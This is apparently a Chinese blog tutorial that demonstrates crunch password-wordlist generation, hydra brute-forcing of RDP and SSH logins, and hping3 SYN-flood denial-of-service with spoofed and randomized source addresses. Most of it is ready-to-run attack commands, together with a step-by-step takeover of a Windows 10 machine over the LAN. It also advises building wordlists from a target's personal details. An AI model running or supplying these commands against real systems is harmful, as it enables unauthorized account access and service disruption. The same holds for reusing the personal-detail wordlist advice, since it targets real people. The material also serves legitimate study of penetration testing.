crunch生成密码字典,hydra暴力破解正常win10用户,hping3进行dos攻击代码抓包演示及命令详解

Crunch

基本命令:
crunch min max [options] data  <min:最小长度,max:最大长度,options:可选项,data:字符集>

生成由1234567890组成的三位密码

crunch 3 3 1234567890 

可选项

-o:将结果输出到指定文件

crunch 3 3 1234567890 -o ./passwd.txt

-t:设置密码模式

crunch 5 5 -t @@^%% \\其中 @@ 代表两个小写字母,^代表特殊字符,%% 代表两个数字

-d [次数+受限制的字符类型]:  生成字符不连续的密码

crunch 3 3 12345 -d 1% -o ./passwd.txt \\生成密码时单个密码同个数字最多连续出现一次<1%:121,2%:112,3%:111>

生成数字不连续的密码

crunch 6 6 -t abc%%% -d 1% -o passwd.txt // 生成的密码中,数字不能连续

生成小写字母和数字都不连续的密码

crunch 6 6 -t a%%@@@ -d 1% -d 1@ -o passwd.txt // 生成的密码中数字不连续,小写字母也不连续

crunch数据类型

<%:数字,@:小写字母,,:大写字母,^:特殊字符>

个人推荐密码字典获取方式

1:使用社工密码生成器根据姓名年龄喜好进行生成

2:直接在购物平台购买常用密码字典

hydra工具详解

基本语法

hydra [选项] [协议://][目标IP|目标域名][:端口] [模块选项]        【标准】

hydra -l 用户名  -P 密码字典 主机地址  协议        【常用】

-l指定用户名-P指定密码字典

hydra -l Administrator -P passwd.txt rdp//:192.168.10.158        \\以192.168.10.158管理员用户的rdp【3389端口】协议进行爆破

hydra -l msfadmin -P passwd.txt  192.168.10.123 ssh        \\对msfadmin靶场的ssh【22端口】远程连接协议进行爆破

常用选项

  • -R : 恢复一个之前的暴力破解任务。
  • -S : 在 SSL 连接中使用定义的协议进行破解。
  • -s PORT : 如果目标服务不运行在默认端口,使用这个选项来定义端口。
  • -l LOGIN : 指定一个登录名进行破解。
  • -L FILE : 指定一个包含多个登录名的文件进行破解。
  • -p PASS : 尝试一个特定的密码进行破解。
  • -P FILE : 指定一个包含多个密码的文件进行破解。
  • -e nsr : 尝试空密码、登录名作为密码或者反向登录名作为密码。
  • -C FILE : 指定一个包含 "login:pass" 格式的文件,用于进行组合破解。
  • -t TASKS : 同时运行的任务数,用于加速破解过程。
  • -w TIME : 设置连接超时时间。
  • -vV : 显示详细过程,大写的 V 会显示更多详细信息。

对正常win10用户进行暴力破解

工具 :社工密码字典生成器,hydra暴力破解,nmap扫描目标主机

环境准备

1:与目标主机在同一个局域网下(连接同一个wifi)

2:能ping通目标主机

3:目标主机信息:博主常用win10系统主机,防火墙等各项功能均为开启状态

4:攻击机:kali2022

开始攻击

ifconfig查看网段信息并使用nmap扫描整个网段获取3384端口开放情况和主机操作系统类型

根据扫描结果可以判断目标主机地址为255.3        rdp(3389端口)服务是开启状态        目标主机大概率是windows且大概率存在管理员Administrator用户

根据扫描结果判断对目标进行暴力破解

拿到爆破结果对目标进行rdp远程连接(由于时间原因密码字典中直接放了准确的密码,实战可根据目标信息进行密码字典生成)

rdesktop 192.168.255.3

// 在kali中远程桌面,输入密码即可连接

hping3工具发起dos攻击代码演示【抓包查看效果】

工具介绍

hping3:可以构造TCP/IP中的数据包,并且可以以泛洪模式发送

syn泛洪攻击rdp服务

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158

命令详解

hping3 发包类型 发包模式 -p 端口 目标主机地址
发包类型:
--syn:SYN
--udp:UDP
--icmp:ICMP

发包模式:
--flood:泛洪模式

指定端口:

-p

伪造源地址

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158 -a 1.1.1.1

-a 1.1.1.1

伪造源地址为1.1.1.1

伪造随机源地址

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158 --rand-source

--rand-source

随机伪造源地址

相关推荐

  1. 暴力破解攻击与彩虹表攻击

    2024-04-03 08:42:02       54 阅读
  2. DNS欺骗攻击技术详解实战代码解析

    2024-04-03 08:42:02       35 阅读
  3. Linux防止暴力破解密码脚本

    2024-04-03 08:42:02       38 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-03 08:42:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-03 08:42:02       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-03 08:42:02       87 阅读
  4. Python语言-面向对象

    2024-04-03 08:42:02       96 阅读

热门阅读

  1. 读《Spring实战》第二章:装配bean

    2024-04-03 08:42:02       39 阅读
  2. oracle杀外部连接会话

    2024-04-03 08:42:02       40 阅读
  3. 高级排序算法-快速排序

    2024-04-03 08:42:02       39 阅读
  4. Jenkins 自动化更新 Stable Diffusion 介绍

    2024-04-03 08:42:02       39 阅读
  5. maya移除节点 修改节点

    2024-04-03 08:42:02       44 阅读
  6. 上传.PDF文件转为.DOCX文件

    2024-04-03 08:42:02       46 阅读
  7. 音响或耳机音频处理常用的芯片

    2024-04-03 08:42:02       39 阅读
  8. 微信小程序中路由跳转方式

    2024-04-03 08:42:02       40 阅读
  9. Python网络爬虫(二):Requests库

    2024-04-03 08:42:02       39 阅读
  10. SQLAlchemy 的数据库引擎engine与连接对象Connection

    2024-04-03 08:42:02       34 阅读
  11. Knife4j配置使用笔记

    2024-04-03 08:42:02       38 阅读
  12. nodejs的express负载均衡

    2024-04-03 08:42:02       35 阅读
  13. 每天学习一个Linux命令之dpkg

    2024-04-03 08:42:02       43 阅读